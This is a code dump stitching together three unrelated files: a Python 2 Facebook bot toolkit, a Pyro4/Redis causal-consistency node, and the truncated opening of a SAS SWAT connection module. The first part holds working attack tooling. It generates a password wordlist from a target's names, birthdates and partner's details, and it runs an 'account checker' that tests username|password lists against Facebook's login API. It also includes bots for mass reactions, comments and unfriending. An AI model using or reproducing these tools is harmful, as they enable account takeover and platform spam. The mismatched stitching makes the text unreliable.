os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
lisensi()
|
NodeCausal.py
|
#!/usr/bin/python3
import redis
import os
import threading
import Pyro4
import Pyro4.naming
import sys
import time
# Node class that points to the redis server on the local machine
# Primary-based implementation for causal consistency
class Node(object):
# Initializes the connection to the indicated redis instance
# via ip/hostname & port
def __init__(self, r_ip, r_port, name, nameserver):
self.r_instance = redis.Redis(host = r_ip, port = r_port)
self.name = name
self.pid = os.getpid()
self.timestamp = 0
# This refers to Mr in the algorithm on the slides
# Max timestamp of all writes received by this replica
self.max_write_timestamp = 0
self.name_server = nameserver
# Updates the logical timestamp
@Pyro4.expose
def update_timestamp(self, ts_1, ts_2):
self.timestamp = max(ts_1, ts_2) + 1
# Get primary
# Returns the dictionary containing the sequencer
@Pyro4.expose
def get_primary(self):
return self.name_server.list(metadata_all={"primary"})
# Get all names from name server
# Returns dict name-to-uri
@Pyro4.expose
def get_all_replicas(self):
return self.name_server.list(metadata_all={"replica"})
# Sends message to all replicas
@Pyro4.expose
def send_to_all(self, msg_timestamp, msg_key, msg_value):
replica_dict = self.get_all_replicas()
msg = (msg_timestamp, msg_key, msg_value)
# For testing purposes, to slow propagation
time.sleep(1)
for r in replica_dict.keys():
replica = Pyro4.Proxy(replica_dict[r])
replica.rcv_msg(msg)
# For testing purposes, to slow propagation
time.sleep(1)
# Receives write messages from primary
@Pyro4.expose
def rcv_msg(self, msg):
msg_timestamp, msg_key, msg_value = msg
self.update_timestamp(msg_timestamp, self.timestamp)
self.max_write_timestamp = self.timestamp
self.r_instance.set(msg_key, msg_value)
print(f"Replica at pid: {self.pid} has set key:\"{msg_key}\" and value:\"{msg_value}\"")
# Does a local read on the redis instance and returns the
# value if there is one.
@Pyro4.expose
def get(self, key, client_timestamp):
self.update_timestamp(client_timestamp, self.timestamp)
while True:
# If return rule is satisfied, return
if self.max_write_timestamp > client_timestamp:
db_ret = self.r_instance.get(key)
if db_ret is None:
return None
else:
return self.r_instance.get(key).decode('utf-8')
# Else, wait
else:
print(f"Node at pid:{self.pid} has not received the update yet.")
# Enforce delay for testing
time.sleep(1)
continue
# Causal consistency implemented with primary-based protocol
# This assumes all writes go to the primary (assume 1 primary for all obj)
@Pyro4.expose
def set(self, key, value, client_timestamp):
# Updates timestamp
self.update_timestamp(client_timestamp, self.timestamp)
# If the node is the primary, local write
if self.name == "primary":
self.r_instance.set(key, value)
# Call to propogate then immediately return
msg = (self.timestamp, key, value)
send = threading.Thread(target=self.send_to_all, args=msg)
send.start()
return self.timestamp, f"Ok, key: {key} and value: {value} have been set on the primary with pid:{self.pid}."
# Starts and daemonize this node.
def main(r_ip, r_port, ns_ip, ns_port, name):
daemon = Pyro4.Daemon()
ns = Pyro4.locateNS(host=ns_ip, port=int(ns_port))
node = Node(r_ip, int(r_port), name, ns)
uri = daemon.register(node)
if name == "primary":
ns.register("primary", uri, metadata={"primary"})
else:
ns.register(name, uri, metadata={"replica"})
daemon.requestLoop()
if __name__ == '__main__':
main(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
|
connection.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Class for creating CAS sessions
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import collections
import contextlib
import copy
import inspect
import itertools
import json
import os
import random
import re
import six
import warnings
import weakref
from six.moves.urllib.parse import urlparse
from . import rest
from .. import clib
from .. import config as cf
from ..exceptions import SWATError, SWATCASActionError, SWATCASActionRetry
from ..logging import logger
from ..utils.config import subscribe, get_option
from ..clib import errorcheck
from ..utils.compat import (a2u, a2n, int32, int64, float64, text_types,
binary_types, items_types, int_types, dict_types)
from ..utils import getsoptions
from ..utils.args import iteroptions
from ..formatter import SASFormatter
from .actions import CASAction, CASActionSet
from .table import CASTable
from .transformers import py2cas
from .request import CASRequest
from .response import CASResponse
from .results import CASResults
from .utils.params import ParamManager, ActionParamManager
from .utils.misc import super_dir, any_file_exists
# pylint: disable=W0212
RETRY_ACTION_CODE = 0x280034
SESSION_ABORTED_CODE = 0x2D51AC
def _option_handler(key, value):
''' Handle option changes '''
sessions = list(CAS.sessions.values())
key = key.lower()
if key == 'cas.print_messages':
key = 'print_messages'
elif key == 'cas.trace_actions':
key = 'trace_actions'
elif key == 'cas.trace_ui_actions':
key = 'trace_ui_actions'
else:
return
for ses in sessions:
ses._set_option(**{key: value})
subscribe(_option_handler)
def _lower_actionset_keys(asinfo):
'''
Lowercase action set information keys
Parameters
----------
asinfo : dict
Action set reflection information
Returns
-------
dict
Same dictionary with lower-cased action / param keys
'''
for act in asinfo.get('actions', []):
act['name'] = act['name'].lower()
for param in act.get('params', []):
param['name'] = param['name'].lower()
if 'parmList' in param:
param['parmList'] = _lower_parmlist_keys(param['parmList'])
if 'exemplar' in param:
param['exemplar'] = _lower_parmlist_keys(param['exemplar'])
return asinfo
def _lower_parmlist_keys(parmlist):
'''
Lowercase parmList/exemplar keys
Parameters
----------
parmlist : list
parmList or exemplar reflection information
Returns
-------
list
Same list with lower-cased name keys
'''
for parm in parmlist:
parm['name'] = parm['name'].lower()
if 'parmList' in parm:
parm['parmList'] = _lower_parmlist_keys(parm['parmList'])
if 'exemplar' in parm:
parm['exemplar'] = _lower_parmlist_keys(parm['exemplar'])
return parmlist
@six.python_2_unicode_compatible
class CAS(object):
'''
Create a connection to a CAS server.
Parameters
----------
hostname : string or list-of-strings, optional
Host or URL to connect to. This parameter can also be specified
by a ``CAS_URL`` or ``CAS_HOST`` environment variable.
port : int or long, optional
Port number. If not specified, the value will come from the
``cas.port`` option or ``CAS_PORT`` environment variable.
If a URL is specified in the first parameter, that port number
will be used.
username : string, optional
Name of user on CAS host. This parameter can also be specified
in a ``CAS_USER`` environment variable.
password : string, optional
Password of user on CAS host or OAuth token. If an OAuth token
is specified, the `username` parameter should be None.
This parameter can also be specified in a ``CAS_PASSWORD``
or ``CAS_TOKEN`` environment variable.
session : string, optional
ID of existing session to reconnect to.
locale : string, optional
Name of locale used for the session.
name : string, optional
